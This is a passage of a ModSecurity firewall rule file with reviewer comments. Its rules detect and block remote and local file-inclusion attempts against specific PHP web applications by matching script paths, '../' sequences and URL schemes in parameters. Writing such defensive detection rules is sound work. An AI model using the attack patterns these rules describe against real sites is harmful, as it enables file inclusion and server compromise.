SecRule REQUEST_LINE "@contains /layout_cfg.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003744,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS PHPChess Remote Inclusion Attempt -- layout_cfg.php Root_Path',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3837'"
    SecRule &TX:'/RFI.*ARGS:Root_Path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPChess Remote Inclusion Attempt -- layout_cfg.php Root_Path',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2003745) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPChess Remote Inclusion Attempt -- layout_t_top.php Root_Path
SecRule REQUEST_LINE "@contains /skins/phpchess/layout_t_top.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003745,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS PHPChess Remote Inclusion Attempt -- layout_t_top.php Root_Path',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3837'"
    SecRule &TX:'/RFI.*ARGS:Root_Path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPChess Remote Inclusion Attempt -- layout_t_top.php Root_Path',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009743) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpDatingClub website.php page Parameter Local File Inclusion
# NOTE(review): this is a path-traversal ("../") test on ARGS:page, yet the
# match is stored under the WEB_ATTACK/RFI key like the inclusion rules.
SecRule REQUEST_LINE "@contains /website.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009743,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS phpDatingClub website.php page Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,30176'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:page "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpDatingClub website.php page Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2003372) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPEventMan remote file include
# NOTE(review): the second link looks for "<script>.php?level=<scheme>:/" in
# QUERY_STRING or REQUEST_BODY. QUERY_STRING normally holds only the text
# after "?", so the script-name part of the pattern would not be present for
# a request to /controller/<script>.php?level=... - confirm with a regression
# test; REQUEST_URI may be the intended target.
SecRule REQUEST_LINE "@contains /controller/" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003372,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHPEventMan remote file include',tag:'web-application-attack',tag:'bugtraq,22358'"
    SecRule QUERY_STRING|REQUEST_BODY "(?i:(text\.ctrl\.php|common\.function\.php)\?level=\s*(ftps?|https?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPEventMan remote file include',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2003740) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPFirstPost Remote Inclusion Attempt block.php Include
SecRule REQUEST_LINE "@contains /block.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003740,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS PHPFirstPost Remote Inclusion Attempt block.php Include',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3906'"
    SecRule &TX:'/RFI.*ARGS:Include/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPFirstPost Remote Inclusion Attempt block.php Include',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2010095) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPGenealogy CoupleDB.php DataDirectory Parameter Remote File Inclusion
SecRule REQUEST_LINE "@contains /CoupleDB.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010095,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS PHPGenealogy CoupleDB.php DataDirectory Parameter Remote File Inclusion',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:DataDirectory/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPGenealogy CoupleDB.php DataDirectory Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2003730) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPHtmlLib Remote Inclusion Attempt -- widget8.php phphtmllib
SecRule REQUEST_LINE "@contains /examples/widget8.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003730,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS PHPHtmlLib Remote Inclusion Attempt -- widget8.php phphtmllib',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/467837/100/0/threaded'"
    SecRule &TX:'/RFI.*ARGS:phphtmllib/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPHtmlLib Remote Inclusion Attempt -- widget8.php phphtmllib',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2003731) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPLojaFacil Remote Inclusion Attempt -- ftp.php path_local
# NOTE(review): "/ftp.php" is also a substring of "/libs/ftp.php", so a
# request matched by rule 2003733 below is scored by this rule as well.
SecRule REQUEST_LINE "@contains /ftp.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003731,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS PHPLojaFacil Remote Inclusion Attempt -- ftp.php path_local',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3875'"
    SecRule &TX:'/RFI.*ARGS:path_local/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPLojaFacil Remote Inclusion Attempt -- ftp.php path_local',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2003732) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPLojaFacil Remote Inclusion Attempt -- db.php path_local
SecRule REQUEST_LINE "@contains /libs/db.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003732,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS PHPLojaFacil Remote Inclusion Attempt -- db.php path_local',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3875'"
    SecRule &TX:'/RFI.*ARGS:path_local/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPLojaFacil Remote Inclusion Attempt -- db.php path_local',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2003733) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPLojaFacil Remote Inclusion Attempt -- libs_ftp.php path_local
SecRule REQUEST_LINE "@contains /libs/ftp.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003733,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS PHPLojaFacil Remote Inclusion Attempt -- libs_ftp.php path_local',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3875'"
    SecRule &TX:'/RFI.*ARGS:path_local/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPLojaFacil Remote Inclusion Attempt -- libs_ftp.php path_local',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2008961) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPmyGallery lang parameter Local File Inclusion
# NOTE(review): the message says Local File Inclusion, but the last link
# counts WEB_ATTACK/RFI TX entries for "lang" instead of testing for "../"
# as the other LFI rules in this file do - confirm which check is intended.
SecRule REQUEST_LINE "@contains /_conf/core/common-tpl-vars.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008961,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS PHPmyGallery lang parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32705'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:lang/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPmyGallery lang 
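parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# --- Reviewer notes for the rules below ---
# Each chain starts with a case-sensitive substring match on REQUEST_LINE
# (after urlDecodeUni, htmlEntityDecode and normalisePathWin) for the script
# path; some chains then also require the request line to contain "GET ".
# The last link either counts TX entries whose name matches
# /RFI.*ARGS:<param>/ (the leading & yields a count) or runs a regex on the
# query string / body. On a match it adds audit-log part E, sets tx.msg, adds
# tx.critical_anomaly_score to tx.anomaly_score and stores the matched value
# under tx.<rule.id>-WEB_ATTACK/RFI-<matched_var_name>.
# NOTE(review): the &TX links can only fire if an earlier rule has already
# stored a ...WEB_ATTACK/RFI-ARGS:<param> entry - presumably the generic RFI
# rules; confirm those are loaded and run before this file.
# NOTE(review): chains with the "GET " link do not score the same parameter
# when it arrives with another method.
# NOTE(review): the TX name patterns are not anchored at the end, so short
# names such as ARGS:file also count entries for longer names that begin
# with the same text.

# (2008962) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPmyGallery confdir parameter Remote File Inclusion
SecRule REQUEST_LINE "@contains /_conf/core/common-tpl-vars.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008962,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS PHPmyGallery confdir parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,32705'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:confdir/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPmyGallery confdir parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2003703) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpMyPortal Remote Inclusion Attempt -- articles.inc.php GLOBALS CHEMINMODULES
# Fix: the brackets in the parameter name are now escaped. The TX selector is
# a regular expression, and an unescaped [CHEMINMODULES] is read as a
# character class, so the original pattern could not match a TX entry named
# ...ARGS:GLOBALS[CHEMINMODULES] and the rule stayed silent for the
# parameter it is named after.
SecRule REQUEST_LINE "@contains /inc/articles.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003703,rev:7,msg:'SLR: ET WEB_SPECIFIC_APPS phpMyPortal Remote Inclusion Attempt -- articles.inc.php GLOBALS CHEMINMODULES',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3879'"
    SecRule &TX:'/RFI.*ARGS:GLOBALS\[CHEMINMODULES\]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpMyPortal Remote Inclusion Attempt -- articles.inc.php GLOBALS CHEMINMODULES',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009051) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPOF DB_AdoDB.Class.PHP PHPOF_INCLUDE_PATH parameter Remote File Inclusion
# NOTE(review): the path is matched as "/DB_adodb.class.php" exactly; the
# message spells the file name with different capitalisation and no
# t:lowercase is applied - confirm the casing the application actually uses.
SecRule REQUEST_LINE "@contains /DB_adodb.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009051,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS PHPOF DB_AdoDB.Class.PHP PHPOF_INCLUDE_PATH parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,25541'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:PHPOF_INCLUDE_PATH/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPOF DB_AdoDB.Class.PHP PHPOF_INCLUDE_PATH parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2003735) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPSecurityAdmin Remote Inclusion Attempt -- logout.php PSA_PATH
SecRule REQUEST_LINE "@contains /include/logout.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003735,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS PHPSecurityAdmin Remote Inclusion Attempt -- logout.php PSA_PATH',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23801'"
    SecRule &TX:'/RFI.*ARGS:PSA_PATH/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPSecurityAdmin Remote Inclusion Attempt -- logout.php PSA_PATH',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2002800) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP PHPNuke Remote File Inclusion Attempt
SecRule REQUEST_LINE "@contains /iframe.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2002800,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS PHP PHPNuke Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.zone-h.org/en/advisories/read/id=8694/'"
    SecRule &TX:'/RFI.*ARGS:file/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP PHPNuke Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2003683) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP Turbulence Remote Inclusion Attempt -- turbulence.php GLOBALS tcore
# Fix: brackets escaped in the TX name pattern; unescaped, [tcore] is a
# character class and the selector could not match ...ARGS:GLOBALS[tcore].
SecRule REQUEST_LINE "@contains /user/turbulence.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003683,rev:7,msg:'SLR: ET WEB_SPECIFIC_APPS PHP Turbulence Remote Inclusion Attempt -- turbulence.php GLOBALS tcore',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23580'"
    SecRule &TX:'/RFI.*ARGS:GLOBALS\[tcore\]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP Turbulence Remote Inclusion Attempt -- turbulence.php GLOBALS tcore',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2002898) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP Web Calendar Remote File Inclusion Attempt
# The last link is self-contained: it looks for "includedir=" followed by an
# ftp(s), http(s) or php scheme in the query string or request body, and
# does not depend on TX entries from other rules.
SecRule REQUEST_LINE "@contains /send_reminders.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2002898,rev:7,msg:'SLR: ET WEB_SPECIFIC_APPS PHP Web Calendar Remote File Inclusion Attempt',tag:'web-application-attack',tag:'cve,2005-2717'"
    SecRule QUERY_STRING|REQUEST_BODY "(?i:includedir=\s*(ftps?|https?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP Web Calendar Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009390) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPizabi dac.php sendChatData Parameter Local File Inclusion
SecRule REQUEST_LINE "@contains /chat/dac.php" 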
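"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009390,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS PHPizabi dac.php sendChatData Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34213'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:sendChatData "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPizabi dac.php sendChatData Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# --- Reviewer notes for the rules below ---
# Each chain starts with a case-sensitive substring match on REQUEST_LINE
# (after urlDecodeUni, htmlEntityDecode and normalisePathWin) for the script
# path; some chains then also require the request line to contain "GET ".
# The last link either counts TX entries whose name matches
# /RFI.*ARGS:<param>/ (the leading & yields a count) or tests the argument
# for "../". On a match it adds audit-log part E, sets tx.msg, adds
# tx.critical_anomaly_score to tx.anomaly_score and stores the matched value
# under tx.<rule.id>-WEB_ATTACK/RFI-<matched_var_name> (the "../" rules use
# the same RFI key although their messages say Local File Inclusion).
# NOTE(review): the &TX links can only fire if an earlier rule has already
# stored a ...WEB_ATTACK/RFI-ARGS:<param> entry - presumably the generic RFI
# rules; confirm those are loaded and run before this file.
# NOTE(review): chains with the "GET " link do not score the same parameter
# when it arrives with another method.

# (2009892) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP-Paid4Mail RFI attempt
# Fix: "@contains" is a literal substring test, so the "\:" in the original
# pattern asked for a real backslash in the request line. t:normalisePathWin
# turns backslashes into slashes before the test, so a plain "page=http:"
# request would not match. The backslash is removed; the rest is unchanged.
SecRule REQUEST_LINE "@contains /home.php?page=http:" "phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009892,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS PHP-Paid4Mail RFI attempt ',tag:'web-application-attack',ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP-Paid4Mail RFI attempt ',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2003693) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPtree Remote Inclusion Attempt -- cms2.php s_dir
SecRule REQUEST_LINE "@contains /plugin/HP_DEV/cms2.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003693,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS PHPtree Remote Inclusion Attempt -- cms2.php s_dir',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3860'"
    SecRule &TX:'/RFI.*ARGS:s_dir/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPtree Remote Inclusion Attempt -- cms2.php s_dir',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# Fix (rules 2003672-2003676): the brackets in config[pathMod] are now
# escaped in the TX name pattern. The selector is a regular expression, and
# an unescaped [pathMod] is read as a character class, so the original
# pattern could not match a TX entry named ...ARGS:config[pathMod].

# (2003672) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PMECMS Remote Inclusion Attempt -- mod_image_index.php config pathMod
SecRule REQUEST_LINE "@contains /mod/image/index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003672,rev:8,msg:'SLR: ET WEB_SPECIFIC_APPS PMECMS Remote Inclusion Attempt -- mod_image_index.php config pathMod',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3852'"
    SecRule &TX:'/RFI.*ARGS:config\[pathMod\]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PMECMS Remote Inclusion Attempt -- mod_image_index.php config pathMod',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2003673) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PMECMS Remote Inclusion Attempt -- mod_liens_index.php config pathMod
SecRule REQUEST_LINE "@contains /mod/liens/index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003673,rev:7,msg:'SLR: ET WEB_SPECIFIC_APPS PMECMS Remote Inclusion Attempt -- mod_liens_index.php config pathMod',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3852'"
    SecRule &TX:'/RFI.*ARGS:config\[pathMod\]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PMECMS Remote Inclusion Attempt -- mod_liens_index.php config pathMod',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2003674) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PMECMS Remote Inclusion Attempt -- mod_liste_index.php config pathMod
SecRule REQUEST_LINE "@contains /mod/liste/index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003674,rev:7,msg:'SLR: ET WEB_SPECIFIC_APPS PMECMS Remote Inclusion Attempt -- mod_liste_index.php config pathMod',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3852'"
    SecRule &TX:'/RFI.*ARGS:config\[pathMod\]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PMECMS Remote Inclusion Attempt -- mod_liste_index.php config pathMod',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2003675) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PMECMS Remote Inclusion Attempt -- mod_special_index.php config pathMod
SecRule REQUEST_LINE "@contains /mod/special/index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003675,rev:7,msg:'SLR: ET WEB_SPECIFIC_APPS PMECMS Remote Inclusion Attempt -- mod_special_index.php config pathMod',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3852'"
    SecRule &TX:'/RFI.*ARGS:config\[pathMod\]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PMECMS Remote Inclusion Attempt -- mod_special_index.php config pathMod',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2003676) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PMECMS Remote Inclusion Attempt -- mod_texte_index.php config pathMod
SecRule REQUEST_LINE "@contains /mod/texte/index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003676,rev:7,msg:'SLR: ET WEB_SPECIFIC_APPS PMECMS Remote Inclusion Attempt -- mod_texte_index.php config pathMod',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3852'"
    SecRule &TX:'/RFI.*ARGS:config\[pathMod\]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PMECMS Remote Inclusion Attempt -- mod_texte_index.php config pathMod',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009073) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PNphpBB2 admin_words.php ModName parameter Local File inclusion
SecRule REQUEST_LINE "@contains /admin/admin_words.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009073,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS PNphpBB2 admin_words.php ModName parameter Local File inclusion',tag:'web-application-attack',tag:'bugtraq,33103'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:ModName "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PNphpBB2 admin_words.php ModName parameter Local File inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009074) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PNphpBB2 admin_groups_reapir.php ModName parameter Local File inclusion
SecRule REQUEST_LINE "@contains /admin/admin_groups_reapir.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009074,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS PNphpBB2 admin_groups_reapir.php ModName parameter Local File inclusion',tag:'web-application-attack',tag:'bugtraq,33103'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:ModName "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PNphpBB2 admin_groups_reapir.php ModName parameter Local File inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009075) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PNphpBB2 admin_smilies.php ModName parameter Local File inclusion
SecRule REQUEST_LINE "@contains /admin/admin_smilies.php" 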
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009075,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS PNphpBB2 admin_smilies.php ModName parameter Local File inclusion',tag:'web-application-attack',tag:'bugtraq,33103'"
